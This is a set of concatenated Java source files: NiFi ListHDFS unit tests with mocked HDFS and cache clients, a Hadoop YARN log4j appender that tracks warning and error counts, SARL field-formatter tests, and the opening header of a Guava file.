proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 100L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 100L, 0L, create777(), "owner", "group", new Path("/test/testDir/2.txt")));
// The first iteration should pick up 2 files with the smaller timestamps.
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
// Next iteration should pick up the other 2 files, since nothing else was added.
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 4);
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 110L, 0L, create777(), "owner", "group", new Path("/test/testDir/3.txt")));
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 4);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 5);
}
@Test
public void testMinAgeMaxAge() throws IOException, InterruptedException {
long now = new Date().getTime();
long oneHourAgo = now - 3600000;
long twoHoursAgo = now - 2*3600000;
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, now, now, create777(), "owner", "group", new Path("/test/willBeIgnored.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, now-5, now-5, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, oneHourAgo, oneHourAgo, create777(), "owner", "group", new Path("/test/testFile1.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, twoHoursAgo, twoHoursAgo, create777(), "owner", "group", new Path("/test/testFile2.txt")));
// all files
runner.run();
runner.assertValid();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 3);
runner.clearTransferState();
runner.getStateManager().clear(Scope.CLUSTER);
// invalid min_age > max_age
runner.setProperty(ListHDFS.MIN_AGE, "30 sec");
runner.setProperty(ListHDFS.MAX_AGE, "1 sec");
runner.assertNotValid();
// only one file (one hour ago)
runner.setProperty(ListHDFS.MIN_AGE, "30 sec");
runner.setProperty(ListHDFS.MAX_AGE, "90 min");
runner.assertValid();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // will ignore the file for this cycle
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
// Next iteration should pick up the file, since nothing else was added.
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0).assertAttributeEquals("filename", "testFile1.txt");
runner.clearTransferState();
runner.getStateManager().clear(Scope.CLUSTER);
// two files (one hour ago and two hours ago)
runner.setProperty(ListHDFS.MIN_AGE, "30 sec");
runner.removeProperty(ListHDFS.MAX_AGE);
runner.assertValid();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
runner.clearTransferState();
runner.getStateManager().clear(Scope.CLUSTER);
// two files (now and one hour ago)
runner.setProperty(ListHDFS.MIN_AGE, "0 sec");
runner.setProperty(ListHDFS.MAX_AGE, "90 min");
runner.assertValid();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
}
@Test
public void testListAfterDirectoryChange() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test1"), new FileStatus(1L, false, 1, 1L, 100L,0L, create777(), "owner", "group", new Path("/test1/testFile-1_1.txt")));
proc.fileSystem.addFileStatus(new Path("/test2"), new FileStatus(1L, false, 1, 1L, 150L,0L, create777(), "owner", "group", new Path("/test2/testFile-2_1.txt")));
proc.fileSystem.addFileStatus(new Path("/test1"), new FileStatus(1L, false, 1, 1L, 200L,0L, create777(), "owner", "group", new Path("/test1/testFile-1_2.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "/test1");
runner.run(); // Initial run, latest file from /test1 will be ignored
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // Latest file i.e. testFile-1_2.txt from /test1 should also be picked up now
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
runner.setProperty(ListHDFS.DIRECTORY, "/test2"); // Changing directory should reset the state
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // Will ignore the files for this cycle
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // Since state has been reset, testFile-2_1.txt from /test2 should be picked up
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 3);
}
private FsPermission create777() {
return new FsPermission((short) 0777);
}
private class ListHDFSWithMockedFileSystem extends ListHDFS {
private final MockFileSystem fileSystem = new MockFileSystem();
private final KerberosProperties testKerberosProps;
public ListHDFSWithMockedFileSystem(KerberosProperties kerberosProperties) {
this.testKerberosProps = kerberosProperties;
}
@Override
protected KerberosProperties getKerberosProperties(File kerberosConfigFile) {
return testKerberosProps;
}
@Override
protected FileSystem getFileSystem() {
return fileSystem;
}
@Override
protected File getPersistenceFile() {
return new File("target/conf/state-file");
}
@Override
protected FileSystem getFileSystem(final Configuration config) throws IOException {
return fileSystem;
}
}
private class MockFileSystem extends FileSystem {
private final Map<Path, Set<FileStatus>> fileStatuses = new HashMap<>();
public void addFileStatus(final Path parent, final FileStatus child) {
Set<FileStatus> children = fileStatuses.get(parent);
if (children == null) {
children = new HashSet<>();
fileStatuses.put(parent, children);
}
children.add(child);
}
@Override
@SuppressWarnings("deprecation")
public long getDefaultBlockSize() {
return 1024L;
}
@Override
@SuppressWarnings("deprecation")
public short getDefaultReplication() {
return 1;
}
@Override
public URI getUri() {
return null;
}
@Override
public FSDataInputStream open(final Path f, final int bufferSize) throws IOException {
return null;
}
@Override
public FSDataOutputStream create(final Path f, final FsPermission permission, final boolean overwrite, final int bufferSize, final short replication,
final long blockSize, final Progressable progress) throws IOException {
return null;
}
@Override
public FSDataOutputStream append(final Path f, final int bufferSize, final Progressable progress) throws IOException {
return null;
}
@Override
public boolean rename(final Path src, final Path dst) throws IOException {
return false;
}
@Override
public boolean delete(final Path f, final boolean recursive) throws IOException {
return false;
}
@Override
public FileStatus[] listStatus(final Path f) throws FileNotFoundException, IOException {
final Set<FileStatus> statuses = fileStatuses.get(f);
if (statuses == null) {
return new FileStatus[0];
}
return statuses.toArray(new FileStatus[statuses.size()]);
}
@Override
public void setWorkingDirectory(final Path new_dir) {
}
@Override
public Path getWorkingDirectory() {
return new Path(new File(".").getAbsolutePath());
}
@Override
public boolean mkdirs(final Path f, final FsPermission permission) throws IOException {
return false;
}
@Override
public FileStatus getFileStatus(final Path f) throws IOException {
return null;
}
}
private class MockCacheClient extends AbstractControllerService implements DistributedMapCacheClient {
private final ConcurrentMap<Object, Object> values = new ConcurrentHashMap<>();
private boolean failOnCalls = false;
private void verifyNotFail() throws IOException {
if ( failOnCalls ) {
throw new IOException("Could not call remote service because the unit test marked the service unavailable");
}
}
@Override
public <K, V> boolean putIfAbsent(final K key, final V value, final Serializer<K> keySerializer, final Serializer<V> valueSerializer) throws IOException {
verifyNotFail();
final Object retValue = values.putIfAbsent(key, value);
return (retValue == null);
}
@Override
@SuppressWarnings("unchecked")
public <K, V> V getAndPutIfAbsent(final K key, final V value, final Serializer<K> keySerializer, final Serializer<V> valueSerializer,
final Deserializer<V> valueDeserializer) throws IOException {
verifyNotFail();
return (V) values.putIfAbsent(key, value);
}
@Override
public <K> boolean containsKey(final K key, final Serializer<K> keySerializer) throws IOException {
verifyNotFail();
return values.containsKey(key);
}
@Override
public <K, V> void put(final K key, final V value, final Serializer<K> keySerializer, final Serializer<V> valueSerializer) throws IOException {
verifyNotFail();
values.put(key, value);
}
@Override
@SuppressWarnings("unchecked")
public <K, V> V get(final K key, final Serializer<K> keySerializer, final Deserializer<V> valueDeserializer) throws IOException {
verifyNotFail();
return (V) values.get(key);
}
@Override
public void close() throws IOException {
}
@Override
public <K> boolean remove(final K key, final Serializer<K> serializer) throws IOException {
verifyNotFail();
values.remove(key);
return true;
}
@Override
public long removeByPattern(String regex) throws IOException {
verifyNotFail();
final List<Object> removedRecords = new ArrayList<>();
Pattern p = Pattern.compile(regex);
for (Object key : values.keySet()) {
// keys are matched against the pattern via their toString() representation
Matcher m = p.matcher(key.toString());
if (m.matches()) {
removedRecords.add(values.get(key));
}
}
final long numRemoved = removedRecords.size();
removedRecords.forEach(values::remove);
return numRemoved;
}
}
}
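// Hedged test-helper sketch distilled from the tests above: each listing test runs the processor
// once, sleeps for twice ListHDFS.LISTING_LAG_NANOS so the lag window elapses, and runs again
// before asserting. The helper only captures that repeated pattern; TestRunner and the ListHDFS
// constant are the same ones already used in TestListHDFS.
final class ListingLagTestSupport {
    private ListingLagTestSupport() {
    }
    /** Runs the processor twice, sleeping long enough in between for the listing lag to pass. */
    static void runPastListingLag(final TestRunner runner) throws InterruptedException {
        runner.run();
        Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
        runner.run();
    }
}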
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.util;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.classification.InterfaceStability;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.Time;
import org.apache.log4j.AppenderSkeleton;
import org.apache.log4j.Level;
import org.apache.log4j.Logger;
import org.apache.log4j.spi.LoggingEvent;
import java.util.*;
@InterfaceAudience.Private
@InterfaceStability.Unstable
public class Log4jWarningErrorMetricsAppender extends AppenderSkeleton {
public static final String LOG_METRICS_APPENDER = "RM_LOG_METRICS_APPENDER";
static final int MAX_MESSAGE_SIZE = 2048;
static public class Element {
public Long count;
public Long timestampSeconds;
Element(Long count, Long timestampSeconds) {
this.count = count;
this.timestampSeconds = timestampSeconds;
}
}
static class PurgeElement implements Comparable<PurgeElement> {
String message;
Long timestamp;
PurgeElement(String message, Long timestamp) {
this.message = message;
this.timestamp = timestamp;
}
public int compareTo(PurgeElement e) {
if (e == null) {
throw new NullPointerException("Null element passed to compareTo");
}
int ret = this.timestamp.compareTo(e.timestamp);
if (ret != 0) {
return ret;
}
return this.message.compareTo(e.message);
}
@Override
public boolean equals(Object e) {
if (e == null || !(e instanceof PurgeElement)) {
return false;
}
if (e == this) {
return true;
}
PurgeElement el = (PurgeElement) e;
return (this.message.equals(el.message))
&& (this.timestamp.equals(el.timestamp));
}
@Override
public int hashCode() {
return this.timestamp.hashCode();
}
}
Map<String, SortedMap<Long, Integer>> errors;
Map<String, SortedMap<Long, Integer>> warnings;
SortedMap<Long, Integer> errorsTimestampCount;
SortedMap<Long, Integer> warningsTimestampCount;
SortedSet<PurgeElement> errorsPurgeInformation;
SortedSet<PurgeElement> warningsPurgeInformation;
Timer cleanupTimer;
long cleanupInterval;
long messageAgeLimitSeconds;
int maxUniqueMessages;
final Object lock = new Object();
/**
* Create an appender to keep track of the errors and warnings logged by the
* system. It purges messages older than 1 day and stores up to the last 250
* unique errors and the last 250 unique warnings (the defaults passed to the
* three-argument constructor). The purge thread runs every 5 minutes, unless
* the unique-message limit is hit earlier.
*/
public Log4jWarningErrorMetricsAppender() {
this(5 * 60, 24 * 60 * 60, 250);
}
/**
* Create an appender to keep track of the errors and warnings logged by the
* system.
*
* @param cleanupIntervalSeconds
* the interval at which old messages are purged to prevent the
* message stores from growing unbounded
* @param messageAgeLimitSeconds
* the maximum age of a message in seconds before it is purged from
* the store
* @param maxUniqueMessages
* the maximum number of unique messages of each type we keep before
* we start purging
*/
public Log4jWarningErrorMetricsAppender(int cleanupIntervalSeconds,
long messageAgeLimitSeconds, int maxUniqueMessages) {
super();
errors = new HashMap<>();
warnings = new HashMap<>();
errorsTimestampCount = new TreeMap<>();
warningsTimestampCount = new TreeMap<>();
errorsPurgeInformation = new TreeSet<>();
warningsPurgeInformation = new TreeSet<>();
cleanupTimer = new Timer();
cleanupInterval = cleanupIntervalSeconds * 1000;
cleanupTimer.schedule(new ErrorAndWarningsCleanup(), cleanupInterval);
this.messageAgeLimitSeconds = messageAgeLimitSeconds;
this.maxUniqueMessages = maxUniqueMessages;
this.setName(LOG_METRICS_APPENDER);
this.setThreshold(Level.WARN);
}
/**
* {@inheritDoc}
*/
@Override
protected void append(LoggingEvent event) {
String message = event.getRenderedMessage();
String[] throwableStr = event.getThrowableStrRep();
if (throwableStr != null) {
message = message + "\n" + StringUtils.join("\n", throwableStr);
message =
org.apache.commons.lang3.StringUtils.left(message, MAX_MESSAGE_SIZE);
}
int level = event.getLevel().toInt();
if (level == Level.WARN_INT || level == Level.ERROR_INT) {
// store second level information
Long eventTimeSeconds = event.getTimeStamp() / 1000;
Map<String, SortedMap<Long, Integer>> map;
SortedMap<Long, Integer> timestampsCount;
SortedSet<PurgeElement> purgeInformation;
if (level == Level.WARN_INT) {
map = warnings;
timestampsCount = warningsTimestampCount;
purgeInformation = warningsPurgeInformation;
} else {
map = errors;
timestampsCount = errorsTimestampCount;
purgeInformation = errorsPurgeInformation;
}
updateMessageDetails(message, eventTimeSeconds, map, timestampsCount,
purgeInformation);
}
}
private void updateMessageDetails(String message, Long eventTimeSeconds,
Map<String, SortedMap<Long, Integer>> map,
SortedMap<Long, Integer> timestampsCount,
SortedSet<PurgeElement> purgeInformation) {
synchronized (lock) {
if (map.containsKey(message)) {
SortedMap<Long, Integer> tmp = map.get(message);
Long lastMessageTime = tmp.lastKey();
int value = 1;
if (tmp.containsKey(eventTimeSeconds)) {
value = tmp.get(eventTimeSeconds) + 1;
}
tmp.put(eventTimeSeconds, value);
purgeInformation.remove(new PurgeElement(message, lastMessageTime));
} else {
SortedMap<Long, Integer> value = new TreeMap<>();
value.put(eventTimeSeconds, 1);
map.put(message, value);
if (map.size() > maxUniqueMessages * 2) {
cleanupTimer.cancel();
cleanupTimer = new Timer();
cleanupTimer.schedule(new ErrorAndWarningsCleanup(), 0);
}
}
purgeInformation.add(new PurgeElement(message, eventTimeSeconds));
int newValue = 1;
if (timestampsCount.containsKey(eventTimeSeconds)) {
newValue = timestampsCount.get(eventTimeSeconds) + 1;
}
timestampsCount.put(eventTimeSeconds, newValue);
}
}
/**
* {@inheritDoc}
*/
@Override
public void close() {
cleanupTimer.cancel();
}
/**
* {@inheritDoc}
*/
@Override
public boolean requiresLayout() {
return false;
}
/**
* Get the counts of errors in the time periods provided. Note that the counts
* provided by this function may differ from the ones provided by
* getErrorMessagesAndCounts since the message store is purged at regular
* intervals to prevent it from growing without bounds, while the store for
* the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs (in seconds) for which the counts are
* desired
* @return list of error counts in the time periods corresponding to cutoffs
*/
public List<Integer> getErrorCounts(List<Long> cutoffs) {
return this.getCounts(errorsTimestampCount, cutoffs);
}
/**
* Get the counts of warnings in the time periods provided. Note that the
* counts provided by this function may differ from the ones provided by
* getWarningMessagesAndCounts since the message store is purged at regular
* intervals to prevent it from growing without bounds, while the store for
* the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs (in seconds) for which the counts are
* desired
* @return list of warning counts in the time periods corresponding to cutoffs
*/
public List<Integer> getWarningCounts(List<Long> cutoffs) {
return this.getCounts(warningsTimestampCount, cutoffs);
}
private List<Integer> getCounts(SortedMap<Long, Integer> map,
List<Long> cutoffs) {
List<Integer> ret = new ArrayList<>();
// the earliest (smallest) cutoff spans the largest window, so it bounds the tail map below
Long largestCutoff = Collections.min(cutoffs);
for (int i = 0; i < cutoffs.size(); ++i) {
ret.add(0);
}
synchronized (lock) {
Map<Long, Integer> submap = map.tailMap(largestCutoff);
for (Map.Entry<Long, Integer> entry : submap.entrySet()) {
for (int i = 0; i < cutoffs.size(); ++i) {
if (entry.getKey() >= cutoffs.get(i)) {
int tmp = ret.get(i);
ret.set(i, tmp + entry.getValue());
}
}
}
}
return ret;
}
/**
* Get the errors and the number of occurrences for each of the errors for the
* time cutoffs provided. Note that the counts provided by this function may
* differ from the ones provided by getErrorCounts since the message store is
* purged at regular intervals to prevent it from growing without bounds,
* while the store for the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs (in seconds) for which the counts are
* desired
* @return list of maps corresponding to each cutoff provided; each map
* contains the error and the number of times the error occurred in
* the time period
*/
public List<Map<String, Element>>
getErrorMessagesAndCounts(List<Long> cutoffs) {
return this.getElementsAndCounts(errors, cutoffs, errorsPurgeInformation);
}
/**
* Get the warning and the number of occurrences for each of the warnings for
* the time cutoffs provided. Note that the counts provided by this function
* may differ from the ones provided by getWarningCounts since the message
* store is purged at regular intervals to prevent it from growing without
* bounds, while the store for the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs (in seconds) for which the counts are
* desired
* @return list of maps corresponding to each cutoff provided; each map
* contains the warning and the number of times the warning occurred in
* the time period
*/
public List<Map<String, Element>> getWarningMessagesAndCounts(
List<Long> cutoffs) {
return this.getElementsAndCounts(warnings, cutoffs, warningsPurgeInformation);
}
private List<Map<String, Element>> getElementsAndCounts(
Map<String, SortedMap<Long, Integer>> map, List<Long> cutoffs,
SortedSet<PurgeElement> purgeInformation) {
if (purgeInformation.size() > maxUniqueMessages) {
ErrorAndWarningsCleanup cleanup = new ErrorAndWarningsCleanup();
long cutoff = Time.now() - (messageAgeLimitSeconds * 1000);
cutoff = (cutoff / 1000);
cleanup.cleanupMessages(map, purgeInformation, cutoff, maxUniqueMessages);
}
List<Map<String, Element>> ret = new ArrayList<>(cutoffs.size());
for (int i = 0; i < cutoffs.size(); ++i) {
ret.add(new HashMap<String, Element>());
}
synchronized (lock) {
for (Map.Entry<String, SortedMap<Long, Integer>> element : map.entrySet()) {
for (int i = 0; i < cutoffs.size(); ++i) {
Map<String, Element> retMap = ret.get(i);
SortedMap<Long, Integer> qualifyingTimes =
element.getValue().tailMap(cutoffs.get(i));
long count = 0;
for (Map.Entry<Long, Integer> entry : qualifyingTimes.entrySet()) {
count += entry.getValue();
}
if (!qualifyingTimes.isEmpty()) {
retMap.put(element.getKey(),
new Element(count, qualifyingTimes.lastKey()));
}
}
}
}
return ret;
}
// getters and setters for log4j
public long getCleanupInterval() {
return cleanupInterval;
}
public void setCleanupInterval(long cleanupInterval) {
this.cleanupInterval = cleanupInterval;
}
public long getMessageAgeLimitSeconds() {
return messageAgeLimitSeconds;
}
public void setMessageAgeLimitSeconds(long messageAgeLimitSeconds) {
this.messageAgeLimitSeconds = messageAgeLimitSeconds;
}
public int getMaxUniqueMessages() {
return maxUniqueMessages;
}
public void setMaxUniqueMessages(int maxUniqueMessages) {
this.maxUniqueMessages = maxUniqueMessages;
}
class ErrorAndWarningsCleanup extends TimerTask {
@Override
public void run() {
long cutoff = Time.now() - (messageAgeLimitSeconds * 1000);
cutoff = (cutoff / 1000);
cleanupMessages(errors, errorsPurgeInformation, cutoff, maxUniqueMessages);
cleanupMessages(warnings, warningsPurgeInformation, cutoff,
maxUniqueMessages);
cleanupCounts(errorsTimestampCount, cutoff);
cleanupCounts(warningsTimestampCount, cutoff);
try {
cleanupTimer.schedule(new ErrorAndWarningsCleanup(), cleanupInterval);
} catch (IllegalStateException ie) {
// don't do anything since new timer is already scheduled
}
}
void cleanupMessages(Map<String, SortedMap<Long, Integer>> map,
SortedSet<PurgeElement> purgeInformation, long cutoff,
int mapTargetSize) {
PurgeElement el = new PurgeElement("", cutoff);
synchronized (lock) {
SortedSet<PurgeElement> removeSet = purgeInformation.headSet(el);
Iterator<PurgeElement> it = removeSet.iterator();
while (it.hasNext()) {
PurgeElement p = it.next();
map.remove(p.message);
it.remove();
}
// don't keep more than mapTargetSize keys
if (purgeInformation.size() > mapTargetSize) {
Object[] array = purgeInformation.toArray();
int cutoffIndex = purgeInformation.size() - mapTargetSize;
for (int i = 0; i < cutoffIndex; ++i) {
PurgeElement p = (PurgeElement) array[i];
map.remove(p.message);
purgeInformation.remove(p);
}
}
}
}
void cleanupCounts(SortedMap<Long, Integer> map, long cutoff) {
synchronized (lock) {
Iterator<Map.Entry<Long, Integer>> it = map.entrySet().iterator();
while (it.hasNext()) {
Map.Entry<Long, Integer> element = it.next();
if (element.getKey() < cutoff) {
it.remove();
}
}
}
}
}
// helper function
public static Log4jWarningErrorMetricsAppender findAppender() {
Enumeration<?> appenders = Logger.getRootLogger().getAllAppenders();
while(appenders.hasMoreElements()) {
Object obj = appenders.nextElement();
if(obj instanceof Log4jWarningErrorMetricsAppender) {
return (Log4jWarningErrorMetricsAppender) obj;
}
}
return null;
}
}
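// Hedged usage sketch for the appender above: attach it to the log4j root logger, emit a warning,
// and query the warning counts for a one-hour window. It relies only on APIs defined in this file
// plus the Logger and Time classes already imported; the logger name is illustrative.
final class Log4jWarningErrorMetricsAppenderUsageSketch {
    private Log4jWarningErrorMetricsAppenderUsageSketch() {
    }
    public static void main(String[] args) {
        Logger.getRootLogger().addAppender(new Log4jWarningErrorMetricsAppender());
        Logger.getLogger("example").warn("disk is nearly full");
        Log4jWarningErrorMetricsAppender appender =
            Log4jWarningErrorMetricsAppender.findAppender();
        // cutoffs are expressed in seconds; this one covers the last hour
        Long oneHourAgo = (Time.now() / 1000) - 3600;
        System.out.println(appender.getWarningCounts(Collections.singletonList(oneHourAgo)));
    }
}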
|
|
/*
* Copyright (C) 2014-2017 the original authors or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.sarl.lang.tests.modules.formatting2;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Suite;
import org.junit.runners.Suite.SuiteClasses;
/** Tests for formatting fields.
*
* @author $Author: sgalland$
* @version $Name$ $Revision$ $Date$
* @mavengroupid $GroupId$
* @mavenartifactid $ArtifactId$
*/
@RunWith(Suite.class)
@SuiteClasses({
ValueFieldFormatterTest.FormatterAPITest.class,
})
@SuppressWarnings("all")
public class ValueFieldFormatterTest {
/**
* @author $Author: sgalland$
* @version $FullVersion$
* @mavengroupid $GroupId$
* @mavenartifactid $ArtifactId$
*/
public static class FormatterAPITest extends AbstractMemberFormatterTest {
@Test
public void type() throws Exception {
String source = unformattedCode("val xxx:int");
String expected = formattedCode(" val xxx : int");
assertFormatted(source, expected);
}
@Test
public void types() throws Exception {
String source = unformattedCode("val xxx:int val yyy:boolean");
String expected = formattedCode(
" val xxx : int",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void initialValue() throws Exception {
String source = unformattedCode("val xxx=5");
String expected = formattedCode(" val xxx = 5");
assertFormatted(source, expected);
}
@Test
public void initialValues() throws Exception {
String source = unformattedCode("val xxx=5 val yyy=true");
String expected = formattedCode(
" val xxx = 5",
" val yyy = true");
assertFormatted(source, expected);
}
@Test
public void initialValueType() throws Exception {
String source = unformattedCode("val xxx=5 val yyy : boolean");
String expected = formattedCode(
" val xxx = 5",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void typeInitialValue() throws Exception {
String source = unformattedCode("val xxx:int val yyy=true");
String expected = formattedCode(
" val xxx : int",
" val yyy = true");
assertFormatted(source, expected);
}
@Test
public void typeType() throws Exception {
String source = unformattedCode("val xxx:int val yyy:boolean");
String expected = formattedCode(
" val xxx : int",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void typeComaType() throws Exception {
String source = unformattedCode("val xxx:int ; val yyy:boolean");
String expected = formattedCode(
" val xxx : int;",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void typeInit() throws Exception {
String source = unformattedCode("val xxx:int=45");
String expected = formattedCode(" val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void modifiers() throws Exception {
String source = unformattedCode("protected final val xxx:int=45");
String expected = formattedCode(" protected final val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void twoAnnotations() throws Exception {
String source = unformattedCode("@Pure@Beta val xxx:int=45");
String expected = formattedCode(" @Pure @Beta val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void threeAnnotations() throws Exception {
String source = unformattedCode(multilineString(
"@Pure@Beta",
"@Hello val xxx:int=45"));
String expected = formattedCode(
" @Pure @Beta",
" @Hello val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void annotationValue() throws Exception {
String source = unformattedCode("@SuppressWarnings( value= \"name\" )val xxx:int=45");
String expected = formattedCode(" @SuppressWarnings(value = \"name\") val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void annotationImplicitValue() throws Exception {
String source = unformattedCode("@SuppressWarnings( \"name\" )val xxx:int=45");
String expected = formattedCode(" @SuppressWarnings(\"name\") val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment1() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"* That's the second line.",
"*/val xxx:int=45"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment2() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"That's the second line.*/val xxx:int=45"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment3() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"That's the second line.*/val xxx:int=45 /*Second comment.*/val yyy:int"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45",
"\t/* Second comment.",
"\t */",
"\tval yyy : int");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment4() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"That's the second line.*/val xxx:int=45/*Second comment.*/"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45",
"\t/* Second comment.",
"\t */");
assertFormatted(source, expected);
}
@Test
public void mlJavaComment() throws Exception {
String source = unformattedCode(multilineString(
"/**Hello world.",
"That's the second line.*/val xxx:int=45"));
String expected = formattedCode(
"\t/** Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment1() throws Exception {
String source = unformattedCode(multilineString(
"",
"//Hello world.",
"val xxx:int=45"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment2() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment3() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment4() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45",
"//Second comment",
""));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45",
"\t// Second comment");
assertFormatted(source, expected);
}
@Test
public void slComment5() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45",
"//Second comment",
"val yyy:int=67"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45",
"\t// Second comment",
"\tval yyy : int = 67");
assertFormatted(source, expected);
}
}
}
|
|
/*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
